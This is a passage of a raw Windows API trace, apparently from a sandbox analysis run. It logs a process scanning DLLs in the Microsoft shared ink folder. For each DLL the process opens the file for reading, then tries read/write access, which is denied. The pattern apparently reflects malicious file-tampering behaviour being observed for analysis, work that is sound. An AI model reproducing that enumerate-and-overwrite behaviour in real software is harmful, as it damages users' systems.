dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.870] GetLastError () returned 0x5 [0100.870] GetLastError () returned 0x5 [0100.870] SetLastError (dwErrCode=0x5) [0100.870] GetLastError () returned 0x5 [0100.870] SetLastError (dwErrCode=0x5) [0100.870] GetLastError () returned 0x5 [0100.870] SetLastError (dwErrCode=0x5) [0100.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0100.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0100.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0100.870] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.870] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.870] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79680792, ftCreationTime.dwHighDateTime=0x1d32794, ftLastAccessTime.dwLowDateTime=0x79680792, ftLastAccessTime.dwHighDateTime=0x1d32794, ftLastWriteTime.dwLowDateTime=0x79680792, ftLastWriteTime.dwHighDateTime=0x1d32794, nFileSizeHigh=0x0, nFileSizeLow=0x101200, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="tipskins.dll", cAlternateFileName="")) returned 1 [0100.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0100.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0100.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0100.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0100.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0100.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0100.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0100.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0100.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0100.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0100.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0100.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0100.871] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.871] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.871] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.871] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0100.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.871] AreFileApisANSI () returned 1 [0100.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tipskins.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tipskins.dll", lpUsedDefaultChar=0x0) returned 64 [0100.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0100.871] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.871] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0100.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0100.872] AreFileApisANSI () returned 1 [0100.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0100.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0100.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x6eb58, cchWideChar=64 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tipskins.dll") returned 64 [0100.872] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tipskins.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipskins.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.872] GetFileType (hFile=0x368) returned 0x1 [0100.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0100.872] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.872] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.872] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.873] CloseHandle (hObject=0x368) returned 1 [0100.873] AreFileApisANSI () returned 1 [0100.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0100.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e2d8 [0100.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x6e2d8, cchWideChar=64 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tipskins.dll") returned 64 [0100.873] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tipskins.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipskins.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.873] GetLastError () returned 0x5 [0100.873] GetLastError () returned 0x5 [0100.873] SetLastError (dwErrCode=0x5) [0100.873] GetLastError () returned 0x5 [0100.873] SetLastError (dwErrCode=0x5) [0100.873] GetLastError () returned 0x5 [0100.873] SetLastError (dwErrCode=0x5) [0100.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e2d8 | out: hHeap=0x20000) returned 1 [0100.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0100.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0100.873] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.873] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.873] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7965a52d, ftCreationTime.dwHighDateTime=0x1d32794, ftLastAccessTime.dwLowDateTime=0x7965a52d, ftLastAccessTime.dwHighDateTime=0x1d32794, ftLastWriteTime.dwLowDateTime=0x7965a52d, ftLastWriteTime.dwHighDateTime=0x1d32794, nFileSizeHigh=0x0, nFileSizeLow=0x9e1a0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="tiptsf.dll", cAlternateFileName="")) returned 1 [0100.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0100.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0100.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0100.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0100.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0100.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0100.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0100.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fb08 [0100.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0100.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0100.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fb08 | out: hHeap=0x20000) returned 1 [0100.874] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.874] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.874] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.874] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0100.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.874] AreFileApisANSI () returned 1 [0100.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tiptsf.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tiptsf.dll", lpUsedDefaultChar=0x0) returned 62 [0100.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0100.874] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.874] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0100.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0100.874] AreFileApisANSI () returned 1 [0100.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.875] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6ebe0 [0100.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6ebe0, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tiptsf.dll") returned 62 [0100.875] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tiptsf.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tiptsf.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.965] GetFileType (hFile=0x368) returned 0x1 [0100.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0100.965] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.965] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.965] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.965] CloseHandle (hObject=0x368) returned 1 [0100.965] AreFileApisANSI () returned 1 [0100.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e7a0 [0100.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6e7a0, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tiptsf.dll") returned 62 [0100.966] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tiptsf.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tiptsf.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.966] GetLastError () returned 0x5 [0100.966] GetLastError () returned 0x5 [0100.966] SetLastError (dwErrCode=0x5) [0100.966] GetLastError () returned 0x5 [0100.966] SetLastError (dwErrCode=0x5) [0100.966] GetLastError () returned 0x5 [0100.966] SetLastError (dwErrCode=0x5) [0100.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0100.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0100.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0100.966] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.966] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.966] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x463d4edd, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0x6ebfe576, ftLastAccessTime.dwHighDateTime=0x1d2fa0a, ftLastWriteTime.dwLowDateTime=0x463d4edd, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x17a00, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="tpcps.dll", cAlternateFileName="")) returned 1 [0100.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0100.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0100.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0100.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35250 [0100.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0100.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35250 | out: hHeap=0x20000) returned 1 [0100.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0100.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f0b8 [0100.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0100.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e470 [0100.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f0b8 | out: hHeap=0x20000) returned 1 [0100.967] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.967] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.967] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.967] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0100.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.967] AreFileApisANSI () returned 1 [0100.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tpcps.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tpcps.dll", lpUsedDefaultChar=0x0) returned 61 [0100.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0100.967] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.967] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0100.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0100.967] AreFileApisANSI () returned 1 [0100.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0100.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7a) returned 0x6ea48 [0100.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6ea48, cchWideChar=61 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tpcps.dll") returned 61 [0100.967] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tpcps.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tpcps.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.968] GetFileType (hFile=0x368) returned 0x1 [0100.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0100.968] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.968] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.968] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.968] CloseHandle (hObject=0x368) returned 1 [0100.969] AreFileApisANSI () returned 1 [0100.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0100.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7a) returned 0x6e030 [0100.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6e030, cchWideChar=61 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tpcps.dll") returned 61 [0100.969] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tpcps.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tpcps.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.969] GetLastError () returned 0x5 [0100.969] GetLastError () returned 0x5 [0100.969] SetLastError (dwErrCode=0x5) [0100.969] GetLastError () returned 0x5 [0100.969] SetLastError (dwErrCode=0x5) [0100.969] GetLastError () returned 0x5 [0100.969] SetLastError (dwErrCode=0x5) [0100.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0100.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 